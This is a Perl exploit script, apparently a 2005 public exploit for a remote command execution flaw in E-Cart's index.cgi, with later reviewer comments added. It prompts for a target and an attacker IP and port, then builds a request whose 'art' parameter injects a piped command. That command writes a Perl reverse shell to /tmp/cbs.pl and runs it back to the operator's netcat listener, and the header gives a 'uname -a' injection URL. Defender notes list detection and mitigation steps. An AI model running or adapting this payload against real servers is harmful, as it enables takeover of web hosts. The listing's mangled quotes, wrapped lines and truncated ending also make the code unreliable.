1 #!/usr/bin/perl
2 #
3 # Example added if code doesn’t work for ya:
4 # http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp−ns315.dat|uname%20−a|
5 # /str0ke
6 #
7 #
8 # info: emanuele@orvietolug.org
9 #
10 use IO::Socket;
11
# Banner: names the product, the affected version and the public advisory.
# Informational output only; these lines do not open a connection.
my @banner_lines = (
    "\n\n ~~ www.badroot.org ~~ \n\n",
    " E−Cart E−Commerce Software index.cgi\n",
    " Remote Command Execution Vulnerability\n",
    " Affected version: <= E−Cart 2004 v1.1\n",
    " http://www.securityfocus.com/archive/1/396748/2005−04−20/2005−04−26/0 \n\n",
    " ~~ code by z\\ ~~\n\n\n",
    " 04.23.2005\n\n\n",
);
print $_ for @banner_lines;
19
20
# Read the run parameters from STDIN into the script-wide variables
# $server, $port, $path, $ip and $reverse.
# NOTE(review): only $port gets any check. $path, $ip and $reverse are used
# exactly as typed when the request string is assembled further down.
print "hostname: \n";
$server = <STDIN>;
chomp $server;

print "port: (default: 80)\n";
$port = <STDIN>;
chomp $port;
# Anything empty or containing a non-digit falls back to the default port.
if ($port eq "" or $port =~ /\D/) {
    $port = 80;
}

# The remaining answers are stored without inspection.
for my $question (
    [ "path: (/cgi−bin/ecart/)\n",               \$path    ],
    [ "your ip (for reverse connect): \n",       \$ip      ],
    [ "your port (for reverse connect): \n",     \$reverse ],
) {
    my ($prompt, $slot) = @{$question};
    print $prompt;
    chomp(${$slot} = <STDIN>);
}
37
38
# Separator and progress message shown before the request string is built.
print " \n\n",
      "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n",
      "[*] try to exploiting...\n";
43
# Builds the request path that carries the injection. The `art` parameter ends
# with a `.dat` file name followed by a `|...|` section, the same form as the
# example URL in the header comment; the banner describes the result as remote
# command execution in index.cgi of E-Cart <= 2004 v1.1.
# NOTE(review): presumably index.cgi hands `art` to a two-argument open(),
# which treats a trailing `|` as "run this command" - confirm against the CGI.
#
# The text after the pipe does three things on the web server: changes to /tmp,
# appends the q{...} text to a file named cbs.pl, and runs that file with the
# operator-supplied $ip and $reverse. The q{...} text is a small Perl program
# that connects to that address, duplicates the socket onto STDIN, STDOUT and
# STDERR, and runs `uname -a`, `id` and /bin/sh over it.
#
# Defender notes:
#  - Detection: requests to index.cgi whose `art` value contains `|` or `;`
#    (raw or URL-encoded), a cbs.pl file appearing under /tmp, the web-server
#    account spawning perl or /bin/sh, and new outbound TCP sessions from the
#    web host.
#  - Mitigation: accept only known article file names for `art`, open files
#    with three-argument open(), and restrict outbound connections from the
#    web server.
#
# NOTE(review): $path, $ip and $reverse are interpolated exactly as typed at
# the prompts. The typographic quotes, minus signs and hard line wraps below
# look like artifacts of the printed listing; the text is kept as printed.
# Only the string is assembled here; no code that sends it is visible on this
# page.
44 $string="/$path/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp−ns315.dat|cd /tmp;echo ".q{use Socket;$execute= ’echo "‘uname −a‘";
echo "‘id‘";/bin/sh’;$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port,
$iaddr) || die("Error: $!\n");$proto=getprotobyname(’tcp’);socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n")
;connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET
");system($execute);close(STDIN)}." >>cbs.pl;perl cbs.pl $ip $reverse|";
45
46 print "[*] OK! \n";
47 print "[*] NOW, run in your box: nc −l −vv −p $reverse\n";
48 print "[*] starting connect back on $ip :$reverse\n";
49 print "[*] DONE!\n";
50 print "[*] Loock netcat windows and funny\n\n